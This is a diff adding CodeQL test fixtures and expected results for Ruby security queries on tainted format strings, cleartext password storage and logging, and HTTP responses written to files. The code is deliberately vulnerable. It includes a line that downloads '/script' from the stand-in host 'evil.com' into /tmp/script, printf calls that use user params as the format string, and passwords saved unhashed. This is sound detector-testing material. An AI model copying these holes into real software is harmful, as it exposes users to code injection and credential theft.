+| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params :  | tainted_format_string.rb:18:23:18:37 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:18:23:18:28 | call to params | User-provided value |
+| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params :  | tainted_format_string.rb:19:30:19:44 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:19:30:19:35 | call to params | User-provided value |
+| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params :  | tainted_format_string.rb:21:27:21:41 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:21:27:21:32 | call to params | User-provided value |
+| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params :  | tainted_format_string.rb:22:20:22:34 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:22:20:22:25 | call to params | User-provided value |
+| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params :  | tainted_format_string.rb:28:19:28:33 | ...[...] | $@ flows here and is used in a format string. | tainted_format_string.rb:28:19:28:24 | call to params | User-provided value |
+| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params :  | tainted_format_string.rb:33:12:33:46 | ... + ... | $@ flows here and is used in a format string. | tainted_format_string.rb:33:32:33:37 | call to params | User-provided value |
+| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params :  | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | $@ flows here and is used in a format string. | tainted_format_string.rb:36:30:36:35 | call to params | User-provided value |
--- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref
@@ -0,0 +1 @@
+queries/security/cwe-134/TaintedFormatString.ql
--- a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb
+++ b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb
@@ -0,0 +1,38 @@
+class UsersController < ActionController::Base
+  # Fixture for the cwe-134 TaintedFormatString query test. The matching .expected file pins line:column positions, so keep the layout stable.
+  def show
+    printf(params[:format], arg) # BAD: user-provided value used as the format string, with a format argument
+    Kernel.printf(params[:format], arg) # BAD: same, via an explicit Kernel receiver
+    
+    printf(params[:format]) # GOOD: format string passed without any format arguments
+    Kernel.printf(params[:format]) # GOOD: format string passed without any format arguments
+
+    printf(IO.new(1), params[:format], arg) # BAD: IO object first, then a user-provided format string
+    Kernel.printf(IO.new(1), params[:format], arg) # BAD: same, via an explicit Kernel receiver
+
+    printf("%s", params[:format]) # GOOD: literal format string; the user-provided value is only an argument
+    Kernel.printf("%s", params[:format]) # GOOD: literal format string; the user-provided value is only an argument
+    fmt = "%s"
+    printf(fmt, params[:format]) # GOOD: format string comes from a local holding a literal
+
+    printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]: no format arguments, yet reported in the .expected results
+    Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]: no format arguments, yet reported in the .expected results
+    
+    str1 = Kernel.sprintf(params[:format], arg) # BAD: user-provided value used as the sprintf format string
+    str2 = sprintf(params[:format], arg) # BAD: user-provided value used as the sprintf format string
+
+    str1 = Kernel.sprintf(params[:format]) # GOOD: no format arguments
+    str2 = sprintf(params[:format]) # GOOD: no format arguments
+    
+    stdout = IO.new 1
+    stdout.printf(params[:format], arg) # BAD: user-provided value used as the format string of an IO object's printf
+
+    stdout.printf(params[:format]) # GOOD: no format arguments
+    
+    # Taint via string concatenation
+    printf("A log message: " + params[:format], arg) # BAD: the concatenated string is the format string
+
+    # Taint via string interpolation
+    printf("A log message: #{params[:format]}", arg) # BAD: the interpolated string is the format string
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected
@@ -71,7 +71,7 @@ subpaths
 | logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:23:33:23:40 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
 | logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:26:18:26:34 | "pw: #{...}" | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
 | logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:28:26:28:33 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
-| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] :  | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | an write to password |
+| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] :  | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | a write to password |
 | logging.rb:39:20:39:34 | ...[...] | logging.rb:34:1:34:15 | call to []= :  | logging.rb:39:20:39:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:34:1:34:15 | call to []= | a write to password |
 | logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" :  | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub |
 | logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:63:35:63:88 | call to sub :  | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:63:35:63:88 | call to sub | an assignment to password_masked_ineffective_sub |
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected
@@ -0,0 +1,62 @@
+edges
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:5:39:5:50 | new_password |
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:7:41:7:52 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:13:42:13:53 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:49:15:60 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:87:15:98 | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:45:21:56 | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:83:21:94 | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:28:27:28:38 | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:30:28:30:39 | new_password |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | app/controllers/users_controller.rb:37:39:37:50 | new_password |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | app/controllers/users_controller.rb:44:21:44:32 | new_password |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | app/models/user.rb:5:27:5:38 | new_password |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | app/models/user.rb:11:22:11:33 | new_password |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | app/models/user.rb:17:21:17:32 | new_password |
+nodes
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | semmle.label | "043697b96909e03ca907599d6420555f" :  |
+| app/controllers/users_controller.rb:5:39:5:50 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:7:41:7:52 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | semmle.label | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  |
+| app/controllers/users_controller.rb:13:42:13:53 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:15:49:15:60 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:15:87:15:98 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | semmle.label | "504d224a806cf8073cd14ef08242d422" :  |
+| app/controllers/users_controller.rb:21:45:21:56 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:21:83:21:94 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | semmle.label | "7d6ae08394c3f284506dca70f05995f6" :  |
+| app/controllers/users_controller.rb:28:27:28:38 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:30:28:30:39 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | semmle.label | "ff295f8648a406c37fbe378377320e4c" :  |
+| app/controllers/users_controller.rb:37:39:37:50 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | semmle.label | "78ffbec583b546bd073efd898f833184" :  |
+| app/controllers/users_controller.rb:44:21:44:32 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | semmle.label | "0157af7c38cbdd24f1616de4e5321861" :  |
+| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | semmle.label | "password: #{...}\\n" |
+| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | semmle.label | "password: #{...}" |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | semmle.label | "06c38c6a8a9c11a9d3b209a3193047b4" :  |
+| app/models/user.rb:5:27:5:38 | new_password | semmle.label | new_password |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | semmle.label | "52652fb5c709fb6b9b5a0194af7c6067" :  |
+| app/models/user.rb:11:22:11:33 | new_password | semmle.label | new_password |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | semmle.label | "f982bf2531c149a8a1444a951b12e830" :  |
+| app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password |
+subpaths
+#select
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:5:39:5:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:5:39:5:50 | new_password | here |
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:7:41:7:52 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:13:42:13:53 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:13:42:13:53 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:49:15:60 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:87:15:98 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | here |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:45:21:56 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | here |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:83:21:94 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | here |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:28:27:28:38 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:28:27:28:38 | new_password | here |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:30:28:30:39 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | here |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | app/controllers/users_controller.rb:37:39:37:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | app/controllers/users_controller.rb:37:39:37:50 | new_password | here |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | app/controllers/users_controller.rb:44:21:44:32 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | app/controllers/users_controller.rb:44:21:44:32 | new_password | here |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | here |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | here |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | app/models/user.rb:5:27:5:38 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | app/models/user.rb:5:27:5:38 | new_password | here |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | app/models/user.rb:11:22:11:33 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | app/models/user.rb:11:22:11:33 | new_password | here |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | app/models/user.rb:17:21:17:32 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | app/models/user.rb:17:21:17:32 | new_password | here |
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref
@@ -0,0 +1 @@
+queries/security/cwe-312/CleartextStorage.ql
--- a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb
+++ b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb
@@ -0,0 +1,74 @@
+class UsersController < ApplicationController # fixture for the cwe-312 CleartextStorage query test; .expected pins line:column positions
+  def createLikeCall
+    new_password = "043697b96909e03ca907599d6420555f"
+    # BAD: plaintext password stored to database
+    User.create(name: "U1", password: new_password)
+    # BAD: plaintext password stored to database
+    User.create({ name: "U1", password: new_password })
+  end
+
+  def updateLikeClassMethodCall
+    new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141"
+    # BAD: plaintext password stored to database
+    User.update(1, name: "U1", password: new_password)
+    # BAD: plaintext password stored to database (both hashes carry the password)
+    User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}])
+  end
+
+  def insertAllLikeCall
+    new_password = "504d224a806cf8073cd14ef08242d422"
+    # BAD: plaintext password stored to database (both hashes carry the password)
+    User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}])
+  end
+
+  def updateLikeInstanceMethodCall
+    user = User.find(1)
+    new_password = "7d6ae08394c3f284506dca70f05995f6"
+    # BAD: plaintext password stored to database
+    user.update(password: new_password)
+    # BAD: plaintext password stored to database
+    user.update({password: new_password})
+  end
+
+  def updateAttributeCall
+    user = User.find(1)
+    new_password = "ff295f8648a406c37fbe378377320e4c"
+    # BAD: plaintext password stored to database
+    user.update_attribute("password", new_password)
+  end
+
+  def assignAttributeCall
+    user = User.find(1)
+    new_password = "78ffbec583b546bd073efd898f833184"
+    # BAD: plaintext password assigned to database field
+    user.password = new_password
+    user.save
+  end
+
+  def hashedPasswordAssign
+    user = User.find(1)
+    new_password = "3746e149bfe3d6ccc665c3620d81cd2e"
+    hashed_password = hash_password(new_password) # hash_password is not defined in this fixture
+
+    # GOOD: assigned value is hashed
+    user.password = hashed_password
+  end
+
+  def fileWrites
+    new_password = "0157af7c38cbdd24f1616de4e5321861"
+
+    # BAD: plaintext password stored to disk
+    IO.write("foo.txt", "password: #{new_password}\n")
+
+    # BAD: plaintext password stored to disk
+    File.new("bar.txt", "a").puts("password: #{new_password}")
+  end
+
+  def randomPasswordAssign
+    user = User.find(1)
+    random_password = SecureRandom.hex(20)
+    # GOOD: the `random_password` value here looks like the hash of an unknown password
+    user.password = random_password
+    user.save
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
+++ b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
@@ -0,0 +1,20 @@
+class User < ActiveRecord::Base # fixture model for the cwe-312 CleartextStorage query test; .expected pins line:column positions
+  def set_password_1
+    new_password = "06c38c6a8a9c11a9d3b209a3193047b4"
+    # BAD: directly storing a potential cleartext password to a field (explicit `self` receiver)
+    self.update(password: new_password)
+  end
+
+  def set_password_2
+    new_password = "52652fb5c709fb6b9b5a0194af7c6067"
+    # BAD: directly storing a potential cleartext password to a field (implicit receiver)
+    update(password: new_password)
+  end
+
+  def set_password_3
+    new_password = "f982bf2531c149a8a1444a951b12e830"
+    # BAD: directly assigning a potential cleartext password to a field
+    self.password = new_password
+    self.save
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
@@ -0,0 +1,14 @@
+edges
+| http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:9:16:9:30 | ...[...] :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | http_to_file_access.rb:11:18:11:23 | script |
+nodes
+| http_to_file_access.rb:3:8:3:52 | call to body :  | semmle.label | call to body :  |
+| http_to_file_access.rb:5:12:5:15 | resp | semmle.label | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | semmle.label | call to params :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | semmle.label | ...[...] :  |
+| http_to_file_access.rb:11:18:11:23 | script | semmle.label | script |
+subpaths
+#select
+| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp | $@ flows to file system | http_to_file_access.rb:3:8:3:52 | call to body | Untrusted data |
+| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:11:18:11:23 | script | $@ flows to file system | http_to_file_access.rb:9:16:9:21 | call to params | Untrusted data |
--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
@@ -0,0 +1 @@
+queries/security/cwe-912/HttpToFileAccess.ql
--- a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
+++ b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
@@ -0,0 +1,19 @@
+require "net/http"
+# Fixture for the cwe-912 HttpToFileAccess query test; the .expected file pins line:column positions.
+resp = Net::HTTP.new("evil.com").get("/script").body # response body fetched over HTTP
+file = File.open("/tmp/script", "w")
+file.write(resp) # BAD: HTTP response body written to a file
+
+class ExampleController < ActionController::Base
+    def example
+      script = params[:script] # user-provided value
+      file = File.open("/tmp/script", "w")
+      file.write(script) # BAD: user-provided value written to a file
+    end
+
+    def example2
+      a = "a"
+      file = File.open("/tmp/script", "w")
+      file.write(a) # GOOD: only a string literal is written
+    end
+end
				`@@ -0,0 +1 @@`
				`queries/security/cwe-020/IncompleteHostnameRegExp.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-134/TaintedFormatString.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-312/CleartextStorage.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-912/HttpToFileAccess.ql`